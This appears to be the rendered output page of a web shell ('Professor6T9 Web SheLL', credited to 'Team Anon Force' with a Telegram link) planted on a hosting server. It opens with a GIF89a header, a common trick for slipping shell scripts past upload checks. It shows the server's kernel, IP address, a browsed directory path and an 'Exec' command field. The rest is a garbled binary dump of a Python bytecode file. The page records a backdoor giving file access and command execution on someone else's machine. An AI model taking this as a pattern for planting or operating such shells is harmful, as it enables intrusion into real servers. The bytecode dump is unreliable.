GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
alt
/
python312
/
lib
/
python3.12
/
site-packages
/
pip
/
_vendor
/
pygments
/
formatters
/
__pycache__
[ HOME ]
Exec
Submit
other.cpython-312.pyc
� R`i� � � � d Z ddlmZ ddlmZ ddlmZ ddlmZ g d�Z G d� de� Z G d � d e� ZdZdZ G d � de� Zy)z� pygments.formatters.other ~~~~~~~~~~~~~~~~~~~~~~~~~ Other formatters: NullFormatter, RawTokenFormatter. :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS. :license: BSD, see LICENSE for details. � )� Formatter)�get_choice_opt)�Token)�colorize)� NullFormatter�RawTokenFormatter�TestcaseFormatterc �( � e Zd ZdZdZddgZdgZd� Zy)r z; Output the text unchanged without any formatting. z Text only�text�nullz*.txtc � � | j }|D ]9 \ }}|r!|j |j |� � �)|j |� �; y �N)�encoding�write�encode)�self�tokensource�outfile�enc�ttype�values ��/builddir/build/BUILDROOT/alt-python312-pip-23.3.1-3.el8.x86_64/opt/alt/python312/lib/python3.12/site-packages/pip/_vendor/pygments/formatters/other.py�formatzNullFormatter.format s= � ��m�m��'�L�E�5��� � �e�l�l�3�/�0�� � �e�$� (� N)�__name__� __module__�__qualname__�__doc__�name�aliases� filenamesr � r r r r s$ � �� �D��v��G�� �I�%r r c �2 � e Zd ZdZdZddgZdgZdZd� Zd� Z y ) r a} Format tokens as a raw representation for storing token streams. The format is ``tokentype<TAB>repr(tokenstring)\n``. The output can later be converted to a token stream with the `RawTokenLexer`, described in the :doc:`lexer list <lexers>`. Only two options are accepted: `compress` If set to ``'gz'`` or ``'bz2'``, compress the output with the given compression algorithm after encoding (default: ``''``). `error_color` If set to a color name, highlight error tokens using that color. If set but with no value, defaults to ``'red'``. .. versionadded:: 0.11 z Raw tokens�raw�tokensz*.rawFc �R � t j | fi |�� d| _ t |dg d�d� | _ |j dd � | _ | j du rd| _ | j � t | j d� y y # t $ r t d| j z � �w xY w) N�ascii�compress)� �none�gz�bz2r) �error_colorT�redzInvalid color %r specified) r �__init__r r r( �getr- r �KeyError� ValueError�r �optionss r r/ zRawTokenFormatter.__init__>